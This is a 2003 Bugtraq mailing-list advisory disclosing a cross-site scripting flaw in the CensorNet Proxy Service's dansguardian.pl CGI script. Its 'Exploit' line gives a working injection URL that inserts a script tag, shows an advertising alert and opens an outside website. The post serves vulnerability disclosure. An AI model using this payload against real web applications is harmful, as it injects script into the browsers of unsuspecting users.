CensorNet: Cross Site Scripting Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx, support@xxxxxxxxxx, wrigd006@xxxxxxxx, frenw001@xxxxxxxx
Subject: CensorNet: Cross Site Scripting Vulnerability
From: "Richard Maudsley" <maudr001@xxxxxxxx>
Date: Wed, 22 Oct 2003 12:51:13 +0100
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Hello,

A cross site scripting vulnerability exists in the CensorNet Proxy Service
(www.censornet.com) that allows scripting (and html) to be passed to the
cgi script and displayed in the web browser.

Exploit:
http://SERVER/cgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Counter-Strike__servers__from__£10_per_month!');window.open("http://www.socketx.co.uk";)</script>

Regards,
        Richard Maudsley


- -------------------------------------------------------------------
    This email has been sent from the Royal Borough of Windsor and Maidenhead 
LEA system, if you have cause for complaint regarding the
       content of this email please contact abuse@xxxxxxxx
- -------------------------------------------------------------------

Prev by Date: Re: "Local" and "Remote" considered insufficient
Next by Date: Shatter XP
Previous by thread: Re: [LSD] Security vulnerability in SUN's Java Virtual Machine implementation
Next by thread: Re: CensorNet: Cross Site Scripting Vulnerability
Index(es):
- Date
- Thread